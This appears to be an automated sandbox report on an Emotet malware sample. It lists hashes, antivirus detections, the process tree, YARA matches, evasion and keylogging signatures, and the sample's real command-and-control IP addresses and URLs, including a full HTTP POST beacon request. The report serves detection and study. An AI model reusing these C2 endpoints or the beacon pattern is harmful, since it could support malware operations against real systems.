Windows Analysis Report NWMEaRqF7s.exe

Overview

General Information

Sample Name: NWMEaRqF7s.exe
Analysis ID: 445260
MD5: 0ba53dbed762655999bd37a1d8bee9db
SHA1: 4566e7559e5c4287a25796ed622324a6b5b70e63
SHA256: 77ed3ca0af1fec8c76e4f77114090edec76040713e53f6682151b53d79f28c79

Detection

Emotet
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Antivirus or Machine Learning detection for unpacked file
Connects to several IPs in different countries
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • NWMEaRqF7s.exe (PID: 2944 cmdline: 'C:\Users\user\Desktop\NWMEaRqF7s.exe' MD5: 0BA53DBED762655999BD37A1D8BEE9DB)
    • dot3hc.exe (PID: 5536 cmdline: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe MD5: 0BA53DBED762655999BD37A1D8BEE9DB)
  • svchost.exe (PID: 5976 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5604 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4752 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.347473341.0000000002244000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000002.347079722.00000000005A0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000003.00000002.615086404.00000000022E4000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.NWMEaRqF7s.exe.5a052e.2.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
1.2.NWMEaRqF7s.exe.5a23ae.3.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
1.2.NWMEaRqF7s.exe.5a23ae.3.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
3.2.dot3hc.exe.22d052e.3.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
3.2.dot3hc.exe.22d052e.3.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

                    Sigma Overview

                    No Sigma rule has matched

                    Jbx Signature Overview

                    AV Detection:

                    Antivirus / Scanner detection for submitted sample
                    Source: NWMEaRqF7s.exe, Avira: detected
                    Found malware configuration
                    Source: 3.2.dot3hc.exe.22d052e.3.unpack, Malware Configuration Extractor: Emotet
                    Multi AV Scanner detection for submitted file
                    Source: NWMEaRqF7s.exe, Virustotal: Detection: 84%
                    Source: NWMEaRqF7s.exe, Metadefender: Detection: 68%
                    Source: NWMEaRqF7s.exe, ReversingLabs: Detection: 92%
                    Source: 3.2.dot3hc.exe.22d052e.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
                    Source: 1.2.NWMEaRqF7s.exe.5a052e.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe, Code function: 3_2_02301DEC CryptDecodeObjectEx,3_2_02301DEC
                    Source: NWMEaRqF7s.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe, Code function: 1_2_00410555 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,1_2_00410555
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe, Code function: 1_2_022528FB FindFirstFileW,FindNextFileW,FindClose,1_2_022528FB
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe, Code function: 3_2_00410555 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_00410555
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe, Code function: 3_2_023028FB FindFirstFileW,FindNextFileW,FindClose,3_2_023028FB

                    Networking:

                    C2 URLs / IPs found in malware configuration
                    Source: unknown, Network traffic detected: IP country count 30
                    Source: global traffic, TCP traffic: 192.168.2.6:49730 -> 85.214.28.226:8080
                    Source: global traffic, TCP traffic: 192.168.2.6:49732 -> 162.241.242.173:8080
                    Source: global traffic, TCP traffic: 192.168.2.6:49760 -> 78.24.219.147:8080
                    Source: Joe Sandbox View, IP Address: 94.200.114.161
                    Source: Joe Sandbox View, IP Address: 139.99.158.11
                    Source: Joe Sandbox View, IP Address: 85.214.28.226
                    Source: Joe Sandbox View, ASN Name: ROGERS-COMMUNICATIONSCA
                    Source: Joe Sandbox View, ASN Name: STARHUB-MOBILEStarHubLtdSG
                    Source: Joe Sandbox View, ASN Name: DU-AS1AE
                    Source: global traffic, HTTP traffic detected:
                        POST /DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/ HTTP/1.1
                        Content-Type: multipart/form-data; boundary=---------------------80lhrKDVYliktvcpjgmL9
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: 142.44.137.67:443
                        Content-Length: 4612
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: unknown, TCP traffic detected without corresponding DNS query: 192.158.216.73
                    Source: unknown, TCP traffic detected without corresponding DNS query: 85.214.28.226
                    Source: unknown, TCP traffic detected without corresponding DNS query: 142.44.137.67
                    Source: unknown, TCP traffic detected without corresponding DNS query: 162.241.242.173
                    Source: unknown, TCP traffic detected without corresponding DNS query: 85.152.162.105
                    Source: unknown, TCP traffic detected without corresponding DNS query: 62.30.7.67
                    Source: unknown, TCP traffic detected without corresponding DNS query: 78.24.219.147
                    Source: svchost.exe, 0000000C.00000002.470826359.0000017DE74EC000.00000004.00000001.sdmp, String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000C.00000002.470826359.0000017DE74EC000.00000004.00000001.sdmp, String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000C.00000002.471604595.0000017DE7D15000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","
VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-07T08:53:08.3402540Z||.||e614b8f2-4086-47b8-a8db-bfa82598f22f||1152921505693648129||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 0000000C.00000002.471604595.0000017DE7D15000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","
VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-07T08:53:08.3402540Z||.||e614b8f2-4086-47b8-a8db-bfa82598f22f||1152921505693648129||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
                    Source: unknown
                    HTTP traffic detected: POST /DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/ HTTP/1.1
                    Content-Type: multipart/form-data; boundary=---------------------80lhrKDVYliktvcpjgmL9
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: 142.44.137.67:443
                    Content-Length: 4612
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmpString found in binary or memory: http://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmpString found in binary or memory: http://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/T
                    Source: dot3hc.exe, 00000003.00000002.617493690.00000000029F9000.00000004.00000001.sdmpString found in binary or memory: http://162.241.242.173:8080/nPONFQEvQO/m1R1pV6p0j201mdDM/V3kdX/
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmpString found in binary or memory: http://192.158.216.73/bw3A8vOSwPk/MUmkPxxvia/gp9rmo9BY/Aiyozum4do0I2sb158h/TZEWfRpLT/CpHNbkWtxKNiePn
                    Source: dot3hc.exe, 00000003.00000002.617493690.00000000029F9000.00000004.00000001.sdmpString found in binary or memory: http://78.24.219.147:8080/2VdcJgn3KtqNnFx/FoHxTH03XYaP/
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmpString found in binary or memory: http://78.24.219.147:8080/2VdcJgn3KtqNnFx/FoHxTH03XYaP/t
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmpString found in binary or memory: http://85.152.162.105/jIpQt16P2GWjQ5/wnzZKJ/DKZyC/
                    Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: svchost.exe, 0000000C.00000002.471659904.0000017DE7D75000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRoo
                    Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: svchost.exe, 00000012.00000002.617508051.0000017D2F811000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: svchost.exe, 00000012.00000002.617508051.0000017D2F811000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: svchost.exe, 00000012.00000002.617508051.0000017D2F811000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                    Source: svchost.exe, 00000012.00000002.616906100.0000017D2F6D0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmpString found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
                    Source: svchost.exe, 0000000C.00000003.450618925.0000017DE7D9E000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0040A094 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_0040A094
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0040A094 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_0040A094

                    E-Banking Fraud:

                    Yara detected Emotet
                    Source: Yara matchFile source: 1.2.NWMEaRqF7s.exe.5a052e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.NWMEaRqF7s.exe.5a23ae.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.NWMEaRqF7s.exe.5a23ae.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.dot3hc.exe.22d052e.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.dot3hc.exe.22d052e.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.dot3hc.exe.22d23ae.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.dot3hc.exe.22d23ae.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.NWMEaRqF7s.exe.5a052e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.347473341.0000000002244000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.347079722.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.615086404.00000000022E4000.00000004.00000001.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe File created: C:\Windows\SysWOW64\sqlcecompact40\
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe File deleted: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe:Zone.Identifier
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: String function: 004036EF appears 33 times
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: String function: 0041F71D appears 39 times
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: String function: 0041F6EA appears 140 times
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: String function: 00421418 appears 52 times
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: String function: 004036EF appears 33 times
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: String function: 0041F71D appears 39 times
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: String function: 0041F6EA appears 140 times
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: String function: 00421418 appears 52 times
                    Source: NWMEaRqF7s.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: NWMEaRqF7s.exe, 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamecmdcmxcfg.exe. vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exe, 00000001.00000002.348521498.0000000002E30000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exe, 00000001.00000002.348726962.0000000002F20000.00000002.00000001.sdmpBinary or memory string: originalfilename vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exe, 00000001.00000002.348726962.0000000002F20000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exeBinary or memory string: OriginalFilenamecmdcmxcfg.exe. vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                    Source: classification engineClassification label: mal88.troj.evad.winEXE@8/4@0/88
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_02303686 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,3_2_02303686
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0040638F __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,1_2_0040638F
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
                    Source: NWMEaRqF7s.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: NWMEaRqF7s.exeVirustotal: Detection: 84%
                    Source: NWMEaRqF7s.exeMetadefender: Detection: 68%
                    Source: NWMEaRqF7s.exeReversingLabs: Detection: 92%
                    Source: unknownProcess created: C:\Users\user\Desktop\NWMEaRqF7s.exe 'C:\Users\user\Desktop\NWMEaRqF7s.exe'
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeProcess created: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
